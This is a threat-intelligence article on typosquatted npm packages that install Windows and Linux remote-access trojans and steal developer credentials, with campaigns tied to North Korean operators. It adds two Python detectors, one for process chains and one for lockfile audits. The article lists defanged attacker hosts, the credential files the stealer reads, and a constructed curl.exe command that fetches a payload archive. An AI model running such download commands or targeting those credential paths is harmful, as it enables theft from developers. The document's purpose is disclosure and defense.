Three novel malicious npm packages masquerade as benign CSS and encryption utilities; however, upon installation, they covertly deploy a Windows Remote Access Trojan (RAT). This insidious malware harvests system intelligence, pilfers passwords and Google Chrome extension data, executes unauthorized commands, and exfiltrates files to a remote command server. The suspicious packages operate under the monikers aes-decode-runner-pro, postcss-minify-selector, and postcss-minify-selector-parser. At the time of their discovery, download metrics revealed 145, 256, and 615 installations, respectively. All three materialized within the past month, authored by an npm user identifying as “abdrizak,” and remained fully accessible for public download.
The Art of Meticulous Typosquatting
Their nomenclature is meticulously crafted to evade developer scrutiny. The aes-decode-runner-pro and postcss-minify-selector-parser components masquerade as libraries offering multilayered AES encryption and proprietary codecs, while covertly relying on the authentic postcss-selector-parser package. Meanwhile, postcss-minify-selector promises to compress CSS selectors for PostCSS, inexorably dragging postcss-minify-selector-parser directly into the dependency tree.
This latter stratagem is particularly pernicious. The designation postcss-minify-selector-parser nearly mirrors the immensely popular postcss-selector-parser library, which commands over 127 million weekly downloads. As illuminated by researchers tracing the sinister trajectory from PostCSS typosquat to Windows RAT, irrespective of the initial package selected, the infection vector inevitably culminates in the identical Windows-based malware.
The Labyrinthine Infection Chain
The clandestine chain commences with a JavaScript loader. It inscribes a PowerShell script, designated settings.ps1, onto the local disk and initiates its execution. This script subsequently downloads a ZIP archive from a third-party server, nvidiadriver[.]net, employing the native Windows utility curl.exe.
Concealed within the archive lies a Visual Basic script, update.vbs, activated via wscript.exe. Accompanying it are an embedded Python environment, a loader.py file, and several native Python extensions bearing the .pyd suffix, compiled utilizing Nuitka. The Visual Basic script meticulously orchestrates the Python environment and relinquishes control to loader.py, thereby igniting the trojan’s primary execution sequence.
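As an added detection example (not from the article or the researchers' tooling), the Python below walks constructed Sysmon-style process-creation events and flags each stage of the chain just described: a Node/npm run spawning PowerShell for a .ps1 file, that PowerShell using curl.exe to fetch an archive, wscript.exe launching a .vbs, and the hand-off to an embedded Python interpreter. The event records, pids and file paths are constructed; the download host is the one reported above.

```python
import json

# Constructed Sysmon-style process-creation events (not from the article). pids 100-104
# model the chain described above; pids 200-201 are a benign npm run that also calls curl.exe.
SAMPLE_EVENTS = r"""
{"pid": 100, "ppid": 1,   "image": "C:\\Program Files\\nodejs\\node.exe", "cmdline": "node install.js"}
{"pid": 101, "ppid": 100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -File C:\\Users\\dev\\AppData\\Local\\Temp\\settings.ps1"}
{"pid": 102, "ppid": 101, "image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl.exe -o drv.zip https://nvidiadriver.net/drv.zip"}
{"pid": 103, "ppid": 101, "image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "wscript.exe update.vbs"}
{"pid": 104, "ppid": 103, "image": "C:\\Users\\dev\\AppData\\Local\\Temp\\drv\\python.exe", "cmdline": "python.exe loader.py"}
{"pid": 200, "ppid": 1,   "image": "C:\\Program Files\\nodejs\\node.exe", "cmdline": "node build.js"}
{"pid": 201, "ppid": 200, "image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl.exe https://registry.npmjs.org/postcss"}
"""
# The article defangs the download host; re-fang it only for string matching.
C2_DOWNLOAD_HOST = "nvidiadriver[.]net".replace("[.]", ".")

def parse_events(text: str) -> dict[int, dict]:
    """One JSON event per line -> map of pid to event."""
    return {ev["pid"]: ev for ev in map(json.loads, text.strip().splitlines())}

def ancestors(events: dict[int, dict], pid: int):
    """Yield the parent chain of pid, nearest parent first (stops at an unknown or cyclic ppid)."""
    seen = set()
    while pid in events and pid not in seen:
        seen.add(pid)
        pid = events[pid]["ppid"]
        if pid in events:
            yield events[pid]

def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect_install_chain(events: dict[int, dict]) -> list[tuple[int, str]]:
    """Flag each stage of the node -> powershell -> curl/wscript -> python chain."""
    findings = []
    for ev in events.values():
        img, cmd = image_name(ev["image"]), ev["cmdline"].lower()
        lineage = [image_name(a["image"]) for a in ancestors(events, ev["pid"])]
        if "node.exe" not in lineage:
            continue  # only processes descended from a Node/npm run are in scope
        if img == "powershell.exe" and ".ps1" in cmd:
            findings.append((ev["pid"], "npm run spawned PowerShell executing a .ps1 file"))
        elif img == "curl.exe" and "powershell.exe" in lineage and (".zip" in cmd or C2_DOWNLOAD_HOST in cmd):
            findings.append((ev["pid"], "PowerShell under node used curl.exe to fetch an archive"))
        elif img == "wscript.exe" and ".vbs" in cmd and "powershell.exe" in lineage:
            findings.append((ev["pid"], "PowerShell under node launched a .vbs via wscript.exe"))
        elif img == "python.exe" and "wscript.exe" in lineage:
            findings.append((ev["pid"], "wscript.exe handed off to an embedded Python interpreter"))
    return findings
```

The benign run (pids 200-201) is not flagged because its curl.exe has no PowerShell ancestor, which is the distinction the rule relies on.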
Dispersed Malicious Functionalities
The malicious entity’s functionalities are dispersed elegantly across its Python extensions. The config.pyd file safeguards the command-and-control server address, command identifiers, and registry key designations. Furthermore, api.pyd facilitates clandestine communication with the governing server, while audiodriver.pyd triggers the trojan’s central operational loop. The command.pyd module aggregates intelligence regarding the compromised machine, endeavors to detect virtualized environments, executes shell commands, and orchestrates file exfiltration. Finally, util.pyd manipulates tar and gzip archives to package stolen data.
Of paramount intrigue is auto.pyd. This module purloins Chrome data alongside browser extension intelligence, concurrently attempting to circumvent App-Bound Encryption—a robust Chrome safeguard tethering credential cryptography to a specific application. Upon successful inauguration, the trojan establishes contact with its command server at 95.216.92[.]207:8080, receives directives, downloads novel payloads onto the afflicted host, and hemorrhages the purloined data outward.
Parallel Campaigns Assailing the Ecosystem
Simultaneously, investigators unearthed several parallel campaigns assailing the npm and TypeScript ecosystems. The package apintergrationpost masquerades as a Node.js client for sanctioned security audits; however, it surreptitiously installs the MYRA Linux Remote Access Trojan. During installation, the software compiles a native C-based rootkit, forges three independent persistence mechanisms, cloaks itself as a systemd service, operates imperceptibly without committing payloads to disk, and grants the assailant an interactive shell complete with screen-capturing capabilities.
The @withgoogle/stitch-sdk package flawlessly mimics Stitch, an authentic Google AI design utility. Post-installation, it scours eight distinct credential locations for developer secrets: Claude Code, Git configurations, the ~/.git-credentials file, exposed SSH keys, the GitHub CLI, npm configurations, the ~/.npmrc file, and the Docker configuration located at ~/.docker/config.json. The package exfiltrates any unearthed credentials to the adversary-controlled domain, stitch-production[.]org/api/v1.
An Isolated Supply Chain Apparatus
Five additional packages—procwire, routecraft, endpointmap, bytecraft, and staticlayer—constitute an isolated supply chain apparatus. The routecraft package depends upon procwire, which conversely draws in endpointmap and bytecraft. During a Windows installation, the developer’s workstation receives a binary loader from an external server and triggers its execution. Meanwhile, staticlayer operates on the attackers’ flank: the package dispenses the payload exclusively to clients presenting the precise User-Agent string utilized by the primary loader.
Crucial Remediation and North Korean Ties
Users who have unwittingly installed any of the aforementioned packages are strongly counseled to immediately excise the dependencies, hunt down and obliterate any generated files, and subsequently rotate all credentials associated with the compromised machine. Merely deleting the package may prove insufficient, as these trojans possess ample time to entrench files, establish systemic persistence, or duplicate access keys before project sanitation occurs.
In recent weeks, assaults upon npm have also ensnared the knowledge graph utility gonex-AI/Understand-Anything. The malignant code connects with one of three preordained command servers, transmits a campaign identifier, decrypts a downloaded bot client via XOR, and commands its execution. The subsequent directive arrives via a labyrinthine path: the program scrutinizes the latest transaction at a specific Tron network address, extracts a transaction hash for the BSC network, and finally locates the active payload therein.
The PolinRider Connection
Security analysts have tethered this insidious activity to the North Korean operation dubbed PolinRider. These adversaries insinuated obfuscated JavaScript into the legitimate configuration files of developers across nearly 2,000 compromised GitHub repositories. This code ushers in the notorious BeaverTail data stealer, which consequently paves a path for the InvisibleFerret backdoor.
One particular offensive leveraged a forged pull request description featuring fabricated testing outcomes. The payload lay concealed within horizontal whitespaces of the altered code, whilst the secondary command stage was outsourced to a public blockchain, allowing a single published ledger entry to be read globally. When verifying dependencies, developers must now scrutinize beyond mere library titles and download tallies; they must remain perpetually vigilant against novel doppelgänger packages, convoluted dependency chains, and scripts that execute autonomously post-installation.
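A dependency audit in the spirit of that advice, as an added example and not code from the article or any project it names: it walks a constructed npm lockfile, flags the package names reported above, applies a token-superset heuristic for names shadowing postcss-selector-parser, flags any entry npm marked with hasInstallScript, and reports which package pulled each one into the tree. The lockfile contents, the native-addon-example package and all versions are constructed.

```python
import json
# Package names reported in the article (IoC list) and the trusted library one of them shadows.
KNOWN_MALICIOUS = {"aes-decode-runner-pro", "postcss-minify-selector", "postcss-minify-selector-parser",
                   "apintergrationpost", "@withgoogle/stitch-sdk", "procwire", "routecraft",
                   "endpointmap", "bytecraft", "staticlayer"}
TRUSTED = {"postcss-selector-parser"}

# Constructed npm lockfile (lockfileVersion 3 layout; versions made up). npm sets
# "hasInstallScript" on entries whose manifest declares a preinstall/install/postinstall script.
SAMPLE_LOCK = json.dumps({"name": "demo-app", "lockfileVersion": 3, "packages": {
    "": {"name": "demo-app", "dependencies": {"postcss": "^8.4.0", "postcss-selector-parser": "^6.0.0",
                                              "postcss-minify-selector": "^1.0.0", "native-addon-example": "^1.0.0"}},
    "node_modules/postcss": {"version": "8.4.0"},
    "node_modules/postcss-selector-parser": {"version": "6.0.0"},
    "node_modules/postcss-minify-selector": {"version": "1.0.0", "hasInstallScript": True,
                                             "dependencies": {"postcss-minify-selector-parser": "^1.0.0"}},
    "node_modules/postcss-minify-selector-parser": {"version": "1.0.0", "hasInstallScript": True},
    "node_modules/native-addon-example": {"version": "1.0.0", "hasInstallScript": True},
}})

def pkg_name(lock_key: str) -> str:
    # 'node_modules/a/node_modules/b' -> 'b'; the root project entry '' stays ''
    return lock_key.rsplit("node_modules/", 1)[-1]

def looks_like_doppelganger(name: str, trusted=TRUSTED):
    """Heuristic: name contains every hyphen-separated token of a trusted package
    but is not that package (postcss-minify-selector-parser vs postcss-selector-parser)."""
    return next((t for t in trusted if name != t and set(t.split("-")) <= set(name.split("-"))), None)

def audit_lockfile(text: str) -> list[tuple[str, str, str]]:
    """Return (package, reason, pulled-in-by) triples for suspicious lockfile entries."""
    packages = json.loads(text)["packages"]
    parents: dict[str, set[str]] = {}  # dependency name -> packages that require it
    for key, meta in packages.items():
        for dep in meta.get("dependencies", {}):
            parents.setdefault(dep, set()).add(pkg_name(key) or "(root)")
    findings = []
    for key, meta in packages.items():
        name = pkg_name(key)
        if not name:
            continue  # the root project itself
        via = ", ".join(sorted(parents.get(name, ()))) or "?"
        if name in KNOWN_MALICIOUS:
            findings.append((name, "known malicious package from this campaign", via))
        elif (shadowed := looks_like_doppelganger(name)):
            findings.append((name, f"name shadows trusted package {shadowed}", via))
        if meta.get("hasInstallScript"):
            findings.append((name, "declares a lifecycle install script; review before installing", via))
    return findings
```

The "pulled-in-by" column is what exposes the indirect route the article describes: postcss-minify-selector-parser never appears in the project's own dependencies, only as a child of postcss-minify-selector.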